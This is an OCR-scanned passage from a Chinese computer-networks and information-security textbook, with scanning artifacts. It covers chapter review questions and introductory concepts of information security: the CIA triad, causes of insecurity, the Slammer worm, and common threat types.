因特网 


图 2-16 主机 C 的 两 个 服务 器 进程 分 别 向 主机 A 和 B 的 客户 进程 提供 服务 


2.4 本 章 小 结 


本 章 介绍 计算 机 网 络 在 信息 时 代 的 作用 ,接着 对 互联 网 进行 了 概述 ,包括 互联 网 发 展 
的 三 个 阶段 ,以 及 今后 的 发 展 趋势 。 然 后 ,讨论 了 互联 网 的 组 成 ,指出 了 互联 网 的 边缘 部 
分 和 核心 部 分 的 重要 区 别 。 在 简单 介绍 了 计算 机 网 络 在 我 国 的 发 展 以 及 计算 机 网 络 的 类 
别 后 ,又 讨论 了 计算 机 网 络 的 性 能 指标 。 最 后 ,论述 了 计算 机 网 络 的 重要 概念 一 一 体系 
结构 。 
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1. 计算 机 网 络 向 用 户 可 以 提供 哪些 服务 ? 
2. 互联 网 的 发 展 大 致 分 为 哪 几 个 阶段 ”请 指出 这 几 个 阶段 最 主要 的 特点 。 
3. 互联 网 的 两 大 组 成 部 分 (边缘 部 分 与 核心 部 分 ) 的 特点 是 什么 ? 它们 的 工作 方式 


各 有 什么 特点 ? 


4. 试 简 述 分 组 交换 的 要 点 。 

. 计算 机 网 络 都 有 哪些 类 别 ? 各 种 类 别 的 网 络 都 有 哪些 特点 ? 

. 计算 机 网 络 中 的 主干 网 和 本 地 接 入 网 的 主要 区 别 是 什么 ? 

. 计算 机 网 络 有 哪些 常用 的 性 能 指标 ? 

8. 网 络 体系 结构 为 什么 要 采用 分 层次 的 结构 ? 试 举 出 一 些 与 分 层 体系 结构 的 思想 


A a 


相似 的 日 常生 活 。 


9. 协议 与 服务 有 何 区 别 ? 有 何 关系 ? 
10. 试 述 具 有 五 层 协议 的 网 络 体系 结构 的 要 点 ,包括 各 层 的 主要 功能 。 
11. 试 解释 everything over IP 和 IP over everything 的 含义 。 


在 所 3 音 


第 
信息 安全 基本 概念 与 原理 


本 章 学 习 要 点 : 

所 掌握 信息 安全 的 基本 概念 和 基本 服务 ; 

如 了 解 信 息 安 全 面临 的 主要 威胁 ; 

如 了 解 信 息 安 全 体系 结构 ,掌握 相关 概念 和 模型 。 


3.1 信息 安全 概述 


说 到 信息 安全 ,人 们 都 会 想到 计算 机 病毒 .信用 卡 账 号 被 盗 .个 人 信息 泄露 .无 法 正常 
访问 网 络 ,还 会 想到 黑客 “棱镜 门 " 事 件 等 。 那 么 到 底 什么 是 信息 安全 呢 ? 

信息 安全 本 身 包括 的 范围 很 广 ,其 中 包括 如 何 防 范 商业 企业 机 密 泄露 防范 青少年 对 
不 良 信息 的 浏览 个 人 信息 的 泄露 等 。2014 年 ,我 国信 息 安 全 漏洞 总 数 达 8 万 个 ,信息 安 
全 进入 高 危 期 ?。 为 了 加 强 信息 安全 建设 ,2014 年 2 月 27 日 ,中 央 网 络 安全 和 信息 化 领 
导 小 组 成 立 。 该 领导 小 组 将 着 眼 国家 安全 和 长 远 发 展 ,统筹 协调 涉及 经 济 ,政治 文化. 社 
会 及 军事 等 各 个 领域 的 网 络 安全 和 信息 化 重大 问题 ,研究 制定 网 络 安全 和 信息 化 发 展 战 
略 宏观 规划 和 重大 政策 ,推动 国家 网 络 安全 和 信息 化 法 治 建设 ,不 断 增 强 安全 保障 能 力 。 
习近平 总 书记 提出 “没有 网 络 安全 就 没有 国家 安全 ,没有 信息 化 就 没有 现代 化 ”, 信 息 安 
全 、 网 络 安全 已 经 成 为 国家 安全 的 基础 。 


311 信息 安全 的 概念 


1. 信息 与 信息 安全 

1) 数据 与 信息 

要 理解 什么 是 信息 安全 ,需要 先 了 解 什么 是 信息 ,什么 是 数据 ? 

数据 (Data) 是 我 们 日 常生 活 中 经 常用 到 的 一 个 概念 。 比 如 ,通常 我 们 会 说 ,让 事实 说 
话 , 让 数据 说 话 , 数 据 就 是 事实 。 所 以 一 般 认为 : 数据 是 用 来 反映 客观 世界 而 记录 下 来 的 
可 以 鉴别 的 物理 符号 。 数 据 具 有 客观 性 和 可 鉴别 性 ,数据 并 不 只 是 数字 ,所 有 用 来 描述 客 
观 事实 的 语言 .文字 、 图 画 和 模型 等 都 是 数据 。 在 现实 生活 中 , 随 着 生产 和 生活 的 进行 , 数 
据 随 时 随地 不 断 产生 。 例 如 ,我 们 上 网 时 产生 的 浏览 记录 ,手机 的 通话 记录 和 短信 、 微 信 、 
QQ 等 即时 通信 中 的 记录 ,支付 宝 中 的 支付 记录 ,电子 商务 网 上 交易 记录 ,每 支 股票 价格 


@ 人 民 网 http://www. people. com. cn/。 
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的 变化 记录 ,医院 里 病人 的 病历 ,学 校 里 学 生 的 档案 等 等 ,都 是 数据 。 随 着 计算 机 应 用 的 
普及 ,特别 是 智能 终端 的 应 用 ,计算 无 处 不 在 、 网 络 无 处 不 在 数据 无 处 不 在 、 软 件 无 处 不 
在 。 近 年 来 , 随 着 存储 设备 价格 下 降 和 云 计算 的 发 展 ,各 行 各 业 积 累 的 数据 越 来 越 多 , 特 
别 是 大 数据 (Big data) 技 术 的 发 展 ,数据 资源 的 价值 日 益 突显 。 

信息 (Information) 这 一 概念 已 在 社会 各 个 领域 得 到 广泛 应 用 ,那么 什么 是 信息 呢 ? 
关于 信息 的 定义 有 多 种 说 法 ,通常 我 们 认为 : 信息 是 有 一 定 含义 的 数据 ,是 加 工 处 理 后 的 
数据 ,是 对 决策 者 有 用 的 数据 。 信 息 是 人 们 关心 的 事情 的 情况 ,例如 ,对 于 生产 或 销售 某 
产品 的 企业 来 说 ,该 产品 的 市 场 需求 和 销售 利润 的 变化 是 重要 信息 ;对 于 购买 此 产品 的 消 
费 者 来 说 ,产品 的 性 能 及 市 场 价格 是 重要 信息 。 计 划 出 国学 习 的 人 ,关心 出 国信 息 ;准备 
找 工作 的 人 ,关心 就 业 信息 ;炒股 票 的 人 ,关心 股市 信息 。 总 之 ,信息 是 当今 社会 最 重要 的 
要 素 之 一 ,美国 著名 未 来 学 家 托 夫 勒 说 :“ 谁 掌握 了 信息 ,控制 了 网 络 , 谁 将 拥有 整个 世 
界 ,” 数 据 处 理 就 是 将 数据 转化 为 信息 的 过 程 ,信息 技术 也 都 是 围绕 着 数据 收集 、 存 储 、 传 
输 、 加 工 处 理 等 方面 开展 应 用 的 ,如 图 3-1 所 示 。 


4 决策 过 
数据 收集 现实 仙界 决策 过 程 


数据 | 一 一 -| 至 据 处 理 | 信息 


图 3-1 数据 处 理 过 程 


当前 ,我 们 已 经 进入 信息 社会 ,信息 已 经 成 为 一 种 重要 的 战略 资源 。 党 的 十 八大 报告 
中 提出 :“ 坚 持 走 中 国 特色 新 型 工业 化 、 信 息 化 城镇 化 .农业 现代 化 道路 ,推动 信息 化 和 
工业 化 深度 融合 .工业 化 和 城镇 化 良性 互动 ,城镇 化 和 农业 现代 化 相互 协调 ,促进 工业 化 、 
信息 化 、 城 镇 化 ,农业 现代 化 同步 发 展 ." 在 新 的 * 四 化 ”中 ,信息 化 是 新 增加 的 内 容 , 这 表明 
信息 化 已 被 提升 至 国家 发 展 战略 的 高 度 。 当 前 ,信息 化 已 经 覆盖 了 国民 经 济 的 所 有 行业 ， 
正 有 力 地 推进 其 他 “三 化 ”。 信 息 化 成 为 国家 的 重要 战略 。 特 别 是 在 2015 年 3 月 ,李克强 
总 理 在 政府 工作 报告 中 提出 ,“ 制 定 “ 互 联网 十 "行动 计划 ,推动 移动 互联 网 、 云 计算 、 大 数 
据 \ 物 联网 等 与 现代 制造 业 结 合 ,促进 电子 商务 、 工 业 互联 网 和 互联 网 金融 健康 发 展 ,引导 
互联 网 企业 拓展 国际 市 场 。 "进一步 说 明 我 国信 息 化 建设 进入 了 一 个 新 的 阶段 ,基于 互联 
网 的 应 用 创新 将 进一步 推进 各 行 各 业 的 发 展 。 

与 此 同时 , 随 着 社会 信息 化 水 平 的 不 断 提 高 和 电子 政务 与 电子 商务 的 快速 发 展 , 计 算 
机 网 络 与 信息 系统 的 基础 性 ,全 局 性 作用 日 益 增 强 .国民 经 济 与 社会 活动 之 间 的 依赖 关系 
不 断 加 强 。 在 日 常 工作 和 生活 中 ,人 们 越 来 越 依 赖 互联 网 和 各 种 信息 系统 , 越 来 越 多 地 通 
过 信息 系统 管理 企业 的 产 、 供 、 销 、 人 、 财 、 物 , 越 来 越 多 地 通过 互联 网 传递 敏感 信息 。 信 息 
系统 的 一 次 故障 或 事故 会 造成 巨大 的 影响 ,其 至 是 灾难 。 特 别 是 对 于 军事 、 航 空 航天 、 金 
融 、 电 力 等 关键 信息 系统 而 言 ,其 信息 安全 就 更 加 重要 。 

2) 信息 安全 

随 着 全 球 范围 内 数据 泄露 .黑客 攻击 等 安全 事件 不 断 出 现 , 信 息 安 全 (Information 
security) 工 作 的 重要 性 已 为 人 们 所 接受 ,很 多 企业 目前 都 将 信息 安全 工作 提 到 了 战略 性 
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的 高 度 。 然 而 ,企业 信息 安全 究竟 要 做 什么 ?要 关注 哪些 方面 ? 如 何 来 落实 ? 这 些 问题 
一 直 困扰 着 企业 的 管理 者 。 

“信息 安全 ”曾经 仅 是 学 术 界 所 关心 的 术语 ,就 像 五 六 十 年 前 “计算 机 ”被 称 为 “ 电 算 
机 ”一 样 。 现 在 ,“ 信 息 安全 ” 因 各 种 原因 已 经 像 公众 词汇 那样 被 世人 所 熟知 ,尽管 尚 不 能 
与 “计算 机 ”这 个 词汇 的 知名 度 相 比 ,但 也 已 经 具有 广泛 的 普及 性 了 。 问 题 的 关键 在 于 人 
们 对 “计算 机 ”的 理解 不 会 有 什么 太 大 的 偏差 ,而 对 “信息 安全 ”的 理解 则 各 式 各 样 。 种 种 
偏差 主要 来 自 于 不 同 的 角度 来 看 信息 安全 ,因此 出 现 了 “计算 机 安全 ”“ 网 络 安 全 ”“ 信 息 
内 容 安 全 ”之 类 的 说 法 ,也 出 现 了 “机 密 性 ”“ 真 实 性 ”“ 完 整 性 ”“ 可 用 性 ”“ 不 可 否认 性 ” 
等 描述 方式 。 

关于 信息 安全 的 定义 ,以 下 是 一 些 有 代表 性 的 定义 方式 : 

(1) 国内 学 者 给 出 的 定义 是 :“ 信 息 安全 保密 内 容 分 为 实体 安全 ,运行 安全 数据 安 
全 和 管理 安全 四 个 方面 。” 

(2) 我 国 相关 立法 给 出 的 定义 是 :“ 保 障 计算 机 及 其 相关 的 和 配套 的 设备 .设施 (网 
络 ) 的 安全 ,运行 环境 的 安全 ,保障 信息 安全 ,保障 计算 机 功能 的 正常 发 挥 ,以 维护 计算 机 
信息 系统 的 安全 。” 

(3) 英国 BS7799 信息 安全 管理 标准 给 出 的 定义 是 :“ 信 息 安全 是 使 信息 避免 一 系列 
威胁 ,保障 商务 的 连续 性 ,最 大 限度 地 减少 商务 的 损失 ,最 大 限度 地 获取 投资 和 商务 的 回 
报 ,涉及 的 是 机 密 性 ,完整 性 、 可 用 性 。” 

(4) 美国 国家 安全 局 信息 保障 官员 给 出 的 定义 是 :“ 因 为 术语 “信息 安全 ”一直 仅 表 
示 信 息 的 机 密 性 ,在 国防 部 内 部 用 “信息 保障 来 描述 信息 安全 ,也 叫 ‘IA”。 它 包含 五 种 
安全 服务 ,包括 机 密 性 、 完 整 性 、 可 用 性 、 真 实 性 和 不 可 抵赖 性 。” 

(5) 国际 标准 化 委员 会 给 出 的 定义 是 :“ 为 数据 处 理 系统 而 采取 的 技术 的 和 管理 的 
安全 保护 ,保护 计算 机 硬件 软件、 数据 不 因 偶然 的 或 恶意 的 原因 而 遭 到 破坏 .更改 、 显 
露 .这 里 面包 含 了 几 个 层面 的 概念 ,其 中 计算 机 硬件 可 以 看 作 是 物理 层面 ,软件 可 以 看 作 
是 运行 层面 ,再 就 是 数据 层面 ;又 包含 了 属性 的 概念 ,其 中 破坏 涉及 的 是 可 用 性 ,更 改 涉 及 
的 是 完整 性 ,显露 涉及 的 是 机 密 性 。 

由 此 可 见 , 机 密 性 、 真 实 性 、 可 控 性 、 可 用 性 这 四 个 基本 属性 实际 上 就 是 信息 安全 的 四 
个 核心 属性 ,可 以 反映 出 信息 安全 的 基本 概貌 。 通 常 我 们 认为 : 信息 安全 是 指 信息 系统 
(包括 硬件 软件 数据 、 人 ,物理 环境 及 其 基础 设施 ) 受 到 保护 ,不 受 偶然 的 或 者 恶意 的 原 
因而 遭 到 破坏 更改、 泄露 ,系统 连续 可 靠 正 常 地 运行 ,信息 服务 不 中 断 ,最 终 实 现 业务 连 
续 性 。 其 根本 目的 就 是 使 内 部 信息 不 受 内 部 、 外 部 、 自 然 等 因素 的 威胁 。 

信息 安全 的 目标 就 是 保证 计算 机 系统 正常 运行 。 具 体 表现 为 三 个 基本 属性 或 基本 目 
标 为 : 保密 性 (Confidentiality) ,完整 性 (Integrity) 和 可 用 性 (Availability) , 即 信息 技术 评 
估 标 准 中 所 述 的 三 要 素 CIA。 

(1) 保密 性 : 确保 信息 在 存储 、 使 用 ,传输 过 程 中 不 会 泄露 给 非 授 权 用 户 或 实体 ， 

(2) 完整 性 : 确保 信息 在 存储 、 使 用 传输 过 程 中 不 会 被 非 授权 用 户 算 改 ,同时 还 要 
防止 授权 用 户 对 系统 及 信息 进行 不 恰当 算 改 ,保持 信息 内 、 外 部 表示 的 一 致 性 ; 

(3) 可用性: 确保 授权 用 户 或 实体 对 信息 及 资源 的 正常 使 用 不 会 被 异常 拒绝 ,人 允许 
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其 可 靠 而 及 时 地 访问 信息 及 资源 。 

那么 为 什么 会 产生 信息 安全 问题 ,其 根源 是 什么 呢 ? 

当前 ,信息 安全 问题 的 根源 主要 是 计算 机 与 互联 网 (Internet) 相 连 造 成 的 。 互 联网 具 
有 四 个 特点 , 即 国际 化 社会 化 .开放 化 ,个 人 化 。 互 联网 上 的 攻击 不 仅仅 来 自 本 地 网 络 的 
用 户 , 它 可 以 来 自 互 联网 上 的 任何 一 个 台 计 算 机 。 网 络 技 术 是 全 开放 的 ,任何 一 个 人 、 团 
体 都 可 能 获得 。 开 放 性 和 资源 共享 是 网 络 安全 的 根源 。 随 着 网 络 应 用 的 深入 ,人 类 的 生 
活 越 来 越 离 不 开 网 络 , 人 们 可 以 自由 地 访问 网 络 , 自 由 地 使 用 和 发 布 各 种 类 型 的 信息 ,但 
同时 也 面临 着 来 自 网 络 的 安全 威胁 。 

此 外 ,微机 的 安全 结构 过 于 简单 ,操作 系统 存在 安全 缺陷 。 我 们 都 知道 计算 机 的 发 展 
历史 ,从 巨型 机 、 大 型 机 、 中 型 机 到 小 型 机 ,再 到 微机 ,计算 机 的 体积 越 来 越 小 ,计算 机 的 结 
构 越 来 越 简 单 。 微 机 也 叫 个 人 计算 机 ,主要 是 个 人 使 用 的 计算 机 。 为 了 降低 成 本 ,简化 了 
结构 ,去 掉 了 许多 安全 机 制 , 如 存储 器 的 隔离 保护 机 制程 序 安全 保护 机 制 等 。 于 是 ,程序 
的 执行 可 以 不 经 过 认证 ,程序 可 以 被 随意 修改 ,系统 区 域 的 数据 可 以 随意 修改 。 这 样 , 病 
毒 、 蠕 虫 、 木 马 等 恶意 程序 就 趁机 泛滥 了 。 但 是 今天 的 微机 已 经 不 再 是 单纯 的 个 人 计算 
机 ,而 是 办 公 室 或 家 庭 用 的 公用 计算 机 了 。 由 于 微机 去 掉 了 许多 成 熟 的 安全 机 制 , 面 对 现 
在 的 公用 环境 ,微机 的 安全 防御 能 力 就 显得 弱 了 。 更 何况 ,现在 PAD、 智 能 手机 等 设备 又 
进一步 简化 了 微机 的 结构 ,其 安全 机 制 就 更 加 脆弱 。 另 一 方面 ,由 于 操作 系统 的 高 度 复杂 
性 和 多 样 性 ,操作 系统 都 不 可 能 做 到 完全 正确 ,其 安全 缺陷 成 为 黑客 攻击 的 主要 渠道 。 

网 络 的 发 展 把 计算 机 变 成 网 络 中 的 一 个 组 成 部 分 ,在 连接 上 突破 了 机 房 的 地 理 隔 离 ， 
信息 的 交互 扩大 到 了 整个 网 络 。 由 于 互联 网 缺少 足够 的 安全 设计 ,于 是 置 于 网 络 世界 中 
的 计算 机 便 面临 巨大 的 危险 。 现 代 企业 运行 会 涉及 不 同 组 织 的 多 个 信息 系统 ,系统 之 间 
的 联系 日 益 密 切 ,形成 系统 的 系统 (System of Systems,SoS) ,造成 信息 系统 的 规模 不 断 
扩大 ,复杂 性 不 断 增 加 。 现 代 信息 技术 (如 Web 技术 ) 使 系统 之 间 的 连接 更 加 容易 ,但 不 
同系 统 的 连接 会 造成 系统 运行 的 不 确定 性 和 不 可 预见 性 ,从 而 增加 系统 的 风险 。 

更 为 重要 的 是 由 于 信息 是 重要 的 战略 资源 ,各 种 计算 机 系统 集中 管理 着 国家 和 企业 
的 政治 、 军 事 、 经 济 等 重要 信息 ,因此 计算 机 系统 成 为 不 法 分 子 的 主要 攻击 目标 。 当 前 , 信 
息 安 全 的 现状 是 严重 的 。 

以 2003 年 的 Slammer 蠕虫 为 例 ,Slammer 蠕虫 病毒 每 隔 8. 5 秒 钟 就 能 使 它 所 侵袭 
的 范围 增加 一 倍 , 而 一 台 受 到 Slammer 蠕虫 病毒 感染 的 服务 器 每 秒 钟 能 发 出 数 以 万 计 的 
数据 访问 命令 ,从 而 轻而易举 地 导致 网 络 通道 发 生 阻塞 。 据 统计 ,在 10 分 钟 之 内 ,全 球 范 
围 内 所 有 抵抗 能 力 低下 的 服务 器 中 90% 都 被 Slammer 蠕虫 病毒 成 功 侵袭 。 各 大 企业 公 
司 的 网 络 技术 人 员 在 采取 有 效 的 反击 措施 之 前 ,就 发 现 自 己 的 系统 已 经 陷入 了 瘫痪 的 状 
态 。Slammer 蠕虫 不 仅 攻击 各 大 企业 公司 的 内 部 网 络 ,还 对 世界 商务 活动 造成 了 巨大 的 
负面 影响 。 如 美洲 银行 的 自动 提 款 系统 因 Slammer 蠕虫 的 攻击 陷入 瘫痪 ;美国 大 陆 航 空 
公司 的 网 上 订 票 系统 不 能 正常 工作 ;韩国 一 些 电话 公 司 的 电话 线路 无 法 接 通 等 等 。 
Slammer 蠕虫 攻击 所 带 来 的 损失 是 以 前 从 未 有 过 的 。 巾 此 可 见 ,基于 互联 网 的 网 络 攻击 
传播 面 更 广 , 传 播 速度 更 快 ,危害 也 更 大 。 
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2. 信息 安全 的 发 展 历 程 

信息 安全 的 发 展 大 体 上 可 以 分 为 以 下 几 个 方面 。 

(1) 物理 安全 。 早 期 的 信息 安全 主要 关注 的 是 信息 系统 的 物理 安全 , 即 整个 系统 所 
处 的 场所 和 环境 的 安全 .设备 和 设施 的 安全 ,以 及 整个 系统 可 靠 运行 等 方面 ,这 些 都 是 信 
息 系 统 安全 运行 的 基本 保障 。 物 理 安全 是 保证 计算 机 信息 系统 保密 性 、 完 整 性 和 可 用 性 
的 基础 ,如 机 房 门禁 视频 监控 、 防 静电 地 板 以 及 综合 布线 .通信 线路 的 要 求 。 机 房 应 具有 
防火 防盗 温度 湿度 控制 系统 ,还 要 配备 一 定 的 应 急 供 配 电 能 力 以 保证 系统 的 可 用 性 。 通 
过 设备 访问 控制 .边界 保护 、 设 备 及 网 络 资源 管理 等 措施 确保 信息 系统 的 保密 性 和 完整 
性 。 通 过 容错 、 故 障 恢复 及 系统 灾难 备份 等 措施 保证 信息 系统 的 可 用 性 。 

(2) 网 络 安全 。 从 20 世纪 90 年 代 以 来 , 随 着 计算 机 网 络 的 发 展 ,信息 能 够 通过 网 络 
进行 远程 传输 和 交换 ,信息 安全 防护 也 就 不 再 局 限于 信息 系统 的 物理 隔离 ,而 是 要 扩展 到 
整个 网 络 可 以 到 达 的 范围 。 网 络 安全 是 指 网 络 系统 的 硬件 .软件 及 其 系统 中 的 数据 受到 
保护 ,不 因 偶然 的 或 恶意 的 原因 而 遭受 破坏 .更改 和 泄露 ,系统 可 以 连续 可 靠 地 运行 ,网 络 
服务 不 中 断 。 网 络 安全 包括 网 络 设 备 安 全 网络 信息 安全 和 网 络 软件 安全 。 从 广义 来 说 ， 
凡 涉 及 网 络 上 信息 保密 性 、 完 整 性 .可 用 性 和 可 控 性 的 相关 技术 和 理论 都 是 网 络 安全 的 研 
究 范 畴 。 网 络 扩展 了 信息 安全 的 范围 ,使 信息 安全 面临 的 问题 更 加 复杂 。 

(3) 应 用 安全 。 通 常情 况 下 ,信息 都 是 通过 应 用 系统 来 存 取 的 ,因此 ,应 用 系统 安全 
也 是 确保 信息 安全 的 一 个 重要 部 分 。 常 见 的 应 用 有 Web 应 用 数据库 应 用 .电子 商务 . 电 
子 政务 等 ,只 有 在 应 用 安全 的 情况 下 ,才能 保障 基于 这 些 应 用 的 信息 安全 。 在 2000 年 前 
后 ,由 于 互联 网 的 快速 发 展 ,产生 了 大 量 基 于 Web 的 应 用 服务 。 由 于 Web 应 用 的 开放 性 
和 交互 性 ,其 安全 性 面临 巨大 的 挑战 。Web 应 用 安全 涉及 身份 认证 ,数据 访问 控制 .保护 
服务 器 不 被 非法 授权 访问 、 保 护 浏览 器 不 被 恶意 代码 攻击 、 防 护 网 页 不 被 非法 算 改 等 。 近 
年 来 ,智能 手机 的 发 展 和 普及 ,产生 了 大 量 手机 应 用 APP, 应 用 安全 问题 进一步 突出 。 

(4) 数据 安全 。 在 当今 大 数据 时 代 , 数 据 安全 越 来 越 重要 。 在 数据 安全 方面 ,一 是 要 
防止 数据 丢失 ,要 采取 现代 信息 存储 手段 对 数据 进行 主动 防护 ,如 磁盘 阵列 、 数 据 备份 和 
恢复 以 及 异地 容 灾 等 。 二 是 要 防止 数据 泄露 ,采用 现代 密码 算法 对 数据 进行 主动 保护 ,如 
数据 加 密 ,数据 完整 性 检查 、 双 向 强身 份 认证 等 。 当 然 ,还 需要 防止 数据 被 非法 访问 和 咨 
取 , 在 数据 的 传输 和 处 理 过 程 中 对 数据 的 防护 也 很 重要 。 

因此 ,当前 的 信息 安全 包括 物理 安全 、 网 络 安全 、 应 用 安全 和 数据 安全 等 多 个 方面 。 
此 外 ,信息 安全 管理 也 是 信息 安全 的 重要 部 分 。 安 全 意识 不 强 , 责 权 不 明 ,安全 管理 制度 
不 健全 及 缺乏 可 操作 人 性 等 都 会 带 来 信息 安全 风险 。 
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据 国 家 互联 网 应 急 中 心 CCNCERTVCC ) 发 布 的 “网 络 安全 信息 与 动态 周报 ”显示 ， 
2015 年 5 月 25 一 31 日 ,CNCERT 监测 发 现 境内 被 算 改 网 站 数量 为 2905 个 ,境内 被 植 人 
后 门 的 网 站 数量 为 2153 个 ,针对 境内 网 站 的 仿冒 页 面 数量 为 4588。 这 些 数据 进一步 说 
明 信 息 安全 就 在 我 们 身边 。 

我 们 从 内 因 和 外 因 两 个 方面 来 分 析 造 成 信息 安全 问题 的 原因 。 
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1) 内 因 

之 所 以 今天 信息 安全 问题 日 益 突 出 ,其 主要 原因 之 一 是 由 于 人 们 认识 能 力 和 实践 能 
力 的 局 限 性 所 造成 的 。 从 计算 机 发 展 的 历史 来 看 ,从 科学 计算 到 今天 无 所 不 在 的 计算 机 
应 用 ,计算 机 的 功能 远 远 超 出 了 当初 设计 计算 机 的 功能 ,超出 了 当初 的 想象 。 今 天 我 们 用 
计算 机 处 理 着 各 种 各 样 的 数据 ,包括 国家 企业 个 人 各 方面 的 数据 。 

从 计算 机 网 络 的 发 展 来 看 ,从 最 初 的 军事 通信 和 科学 研究 ,到 今天 计算 机 通信 和 网络 以 
及 Internet 已 成 为 我 们 社会 结构 的 一 个 基本 组 成 部 分 。 网 络 被 应 用 于 工商 业 的 各 个 方 
面 ,包括 电子 银行 .电子 商务 、 现 代 化 的 企业 管理 信息 服务 业 等 都 以 计算 机 网 络 系统 为 基 
础 。 从 学 校 远 程 教育 到 政府 日 常 办 公 力 至 现在 的 电子 社区 ,很 多 方面 都 离 不 开 网 络 技术 。 
可 以 不 夸张 地 说 ,网 络 在 当今 世界 无 处 不 在 。 计 算 机 网 络 的 应 用 远 远 超出 当初 网 络 设计 
的 想象 。 

随 着 计算 机 与 计算 机 网 络 应 用 的 普及 ,人 们 认识 水 平 的 不 断 提 高 ,计算 机 与 网 络 安全 
机 制 也 在 不 断 完 善 。 

另 一 方面 , 随 着 计算 机 应 用 的 普及 和 深入 ,软件 系统 的 规模 越 来 越 大 , 越 来 越 复杂 ,以 
至 于 其 复杂 性 超出 了 人 们 控制 和 理解 的 范围 ,软件 中 的 漏洞 不 可 避免 。 例 如 , Windows 
3. 1 超过 300 万 行 代码 ,Windows XP 超过 4000 万 行 代码 ,如 此 庞大 、 复 杂 的 系统 ,尽管 经 
过 严格 的 测试 ,也 无 法 避免 存在 一 些 漏 洞 。 而 事实 上 ,尽管 软件 工程 的 理论 与 方法 不 断 完 
善 ,但 远 远 不 能 满足 软件 应 用 的 需求 。 

此 外 ,在 计算 机 系统 方面 ,还 面临 着 硬件 (如 CPU) 的 安全 隐患 ,操作 系统 (如 
Windows) 的 安全 隐患 .网络 协议 (如 TCP/IP) 的 安全 隐患 ,数据 库 系 统 ( 如 Oracle) 的 安 
全 隐患 ,以 及 面 对 计 算 机 病毒 的 威胁 。 除 了 技术 因素 以 外 ,管理 朴 漏 也 是 造成 信息 安全 问 
题 的 主要 原因 之 一 。 

2) 外 因 

信息 安全 的 外 因 主 要 是 计算 机 信息 系统 面临 着 不 同 层次 的 安全 威胁 。 国 家 层面 的 有 
各 国 的 情报 机 构 ,信息 战士 ,专门 搜集 有 关 政 治 、 军 事 、 经 济 信息 。 例 如 美国 于 2010 年 成 
立 了 网 络 司 令 部 ,负责 计划、 协调 整合、 执行 任务 ,以 指挥 网 络 战 ,保护 特定 的 国防 部 信 
息 网 络 ,执行 网 络 全 谱 作 战 ,确保 美国 及 其 盟友 在 网 络 空间 的 行动 自由 ,消除 对 手 的 行动 
自由 ”。 

除了 国家 安全 威胁 ,还 面临 着 忍 怖 分 子 . 工 业 间谍 、 犯 罪 团 伙 以 及 黑客 等 有 组 织 的 信 
息 安全 威胁 ,他 们 破坏 公共 秩序 .制造 混乱 ;掠夺 企业 竞争 优势 ,进行 恐吓 ;有 计划 的 施行 
报复 ,破坏 制度 ,实现 其 经 济 目的 。 

3) 用 户 安全 意识 需要 进一步 加 强 

在 信息 安全 的 防御 与 攻击 过 程 中 ,就 如 同 战 场 上 的 防御 与 攻击 。 处 于 防御 一 方 的 计 
算 机 信息 系统 用 户 处 于 明 处 ,面临 着 许多 不 利 的 条 件 ,如 信息 安全 管理 体制 不 能 满足 网 络 
发 展 的 需要 ,网 络 安全 技术 远 远 落后 于 网 络 应 用 。 再 加 上 在 网 络 系统 建设 过 程 中 ,往往 忽 
视 网 络 安全 建设 。 用 户 信息 安全 意识 薄弱 ,缺乏 相应 的 信息 安全 知识 ,也 是 造成 信息 安全 
问题 突出 的 一 个 重要 因素 。 

而 对 于 攻击 方 来 说 , 却 恰恰 相反 。 攻 击 者 层次 不 断 提高 ,出 现 黑客 专业 化 的 趋势 , 攻 
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击 者 往往 掌握 了 深层 次 网 络 技术 。 攻 击 点 越 来 越 多 ,攻击 代价 越 来 越 小 ,一 人 一 机 、 安 坐 
家 中 便 能 发 起 攻击 。 攻 击 手段 越 来 越 先进 ,任何 先进 的 技术 都 是 一 把 * 双 为 剑 ”, 计 算 机 性 
能 大 幅 提升 ,为 破译 密码 口令 提供 了 先进 手段 。 

总 的 来 看 ,计算 机 信息 系统 不 安全 的 原因 主要 是 : 自身 缺陷 .开放 性 .黑客 攻击 。 


3.2 信息 安全 的 威胁 


近年 来 ,信息 化 的 迅猛 发 展 也 带 来 诸多 信息 安全 的 问题 。 我 国 基础 网 络 仍 存在 较 多 
漏洞 风险 , 云 服务 日 益 成 为 网 络 攻击 的 重点 目标 。 域 名 系统 面临 严峻 的 拒绝 服务 攻击 , 针 
对 重要 网 站 的 域名 解析 复 改 攻击 频 发 。 网 络 攻击 威胁 日 益 向 工业 互联 网 领域 渗透 ,已 发 
现 我 国 部 分 地 址 感染 专门 针对 工业 控制 系统 的 恶意 程序 事件 。 分 布 式 反射 型 的 拒绝 服务 
攻击 日 趋 频繁 ,大 量 伪造 攻击 数据 包 来 自 境外 网 络 。 针 对 重要 信息 系统 .基础 应 用 和 通用 
软 硬 件 漏洞 的 攻击 异常 活跃 ,漏洞 风险 向 传统 领域 .智能 终端 领域 泛 化 演进 。 网 站 数据 和 
个 人 信息 泄露 现象 依然 严重 ,移动 应 用 程序 成 为 数据 泄露 的 新 主体 。 移 动 恶意 程序 不 断 
发 展演 化 ,网 络 环境 治理 仍然 面临 挑战 。 
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飞速 发 展 的 互联 网 在 给 社会 和 公众 创造 效益 、 带 来 方便 的 同时 ,其 系统 漏洞 和 网 络 的 
开放 性 也 给 国家 的 经 济 建设 和 企业 发 展 以 及 人 们 的 社会 生活 带 来 了 负面 影响 ,病毒 侵袭 、 
网 络 欺诈 、 信 息 污染 .黑客 攻击 等 问题 更 是 给 我 们 带 来 了 困扰 和 和 危害。 计算 机 网 络 所 面临 
的 威胁 主要 有 对 网 络 中 信息 的 威胁 和 对 网 络 设备 的 威胁 两 种 。 影 响 计 算 机 网 络 的 因素 有 
很 多 ,其 所 面临 的 威胁 也 就 来 自 多 个 方面 ,主要 的 威胁 有 如 下 几 种 : 

(1) 人 为 的 失误 : 如 操作 员 安全 配置 不 当 造成 的 安全 漏洞 ,用 户 安全 意识 不 强 , 用 户 
口令 选择 不 慎 , 用 户 将 自己 的 账号 随意 转借 他 人 或 与 别人 共享 都 会 对 网 络 安全 带 来 威胁 。 

(2) 信息 截取 : 通过 信道 进行 信息 的 截取 ,获取 机 密 信息 ,或 通过 信息 的 流量 分 析 、 
通信 频 度 、 长 度 分 析 , 推 出 有 用 信息 ,这 种 方式 不 破坏 信息 的 内 容 , 不 易 被 发 现 。 这 种 方式 
是 在 过 去 军事 对 抗 .政治 对 抗 和 当今 经 济 对 抗 中 最 常用 的 ,也 是 最 有 效 的 方式 。 

